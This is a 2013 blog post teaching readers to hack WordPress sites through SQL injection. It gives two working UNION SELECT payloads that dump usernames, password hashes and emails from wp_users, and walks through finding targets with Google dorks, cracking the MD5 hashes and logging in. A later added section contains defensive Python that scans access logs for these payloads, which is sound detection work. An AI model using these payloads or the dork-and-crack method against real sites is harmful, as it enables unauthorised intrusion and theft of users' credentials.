
Wednesday, 7 August 2013

WordPress SQL Injection Hacks

WordPress SQL Injection Hacks: Another Special Post :-)

There are millions of sites hosted on WordPress, and I have already posted some tutorials on WordPress hacking (you can check them here). This is a new tutorial on WordPress hacking with SQL injections. Let's see.



How to use it?

For example, take these two injections:

"wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--"

index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*

The 1st injection is used in the steps below.

Now modify it into a Google dork. To make the dork, use "inurl:" followed by the injection's PHP file or directory. For example, for this injection the dork will be "inurl:wp-content/plugins/st_newsletter/stnl_iframe.php".

Now go to Google.com, type your modified dork and look at the search results. A search result for this dork will look like this:

http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=

Remove the words after iframe.php and put your SQL injection there. The URL will now be:

http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--

You will get the user name and the md5 coded password. Crack the password using md5 decoding tools and log in here: http://site.com/wp-login.php

Note: The process is the same for all injections. Comment below if you have any doubt.
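Both request strings above leave a recognisable trace in a web server's access log. The following is an added example, not part of the original post: it decodes each logged query string and flags UNION SELECT requests that name the WordPress credential table or columns. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Combined Log Format: ip - - [time] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UNION_RE = re.compile(r"\bunion\b(\s+all)?\s+select\b")
CRED_RE = re.compile(r"\b(wp_users|user_pass|user_login|user_email)\b")

# Constructed sample lines; the two flagged targets reuse the request strings from the post.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Aug/2013:10:00:01 +0000] "GET /index.php?cat=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [07/Aug/2013:10:00:05 +0000] "GET /?s=student+union+hours HTTP/1.1" 200 4310 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Aug/2013:10:01:12 +0000] "GET /wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users-- HTTP/1.1" 404 312 "-" "-"',
    '203.0.113.9 - - [07/Aug/2013:10:02:40 +0000] "GET /index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/* HTTP/1.1" 200 2048 "-" "-"',
]


def normalize(query: str) -> str:
    """Decode '+' and %xx (up to 3 passes), drop /* ... */ blocks, squeeze whitespace, lowercase."""
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    query = re.sub(r"/\*.*?\*/", " ", query)
    return re.sub(r"\s+", " ", query).lower()


def classify(line: str):
    """Return a finding dict for a UNION SELECT query string, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, target, status = m.groups()
    parts = urlsplit(target)
    q = normalize(parts.query)
    if not UNION_RE.search(q):
        return None
    severity = "high" if CRED_RE.search(q) else "medium"  # high: names wp_users or its columns
    return {"ip": ip, "path": parts.path, "status": int(status), "severity": severity}


def scan(lines):
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The status field helps triage: a 404 on the plugin path means the script is not present on that site, while a 200 means the request reached a live script and should be investigated first.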


2 comments:

  1. It works only if the user has that plugin; otherwise it won't work.

  2. NO!! It works, it doesn't matter whether you have the plugin or not, try it.
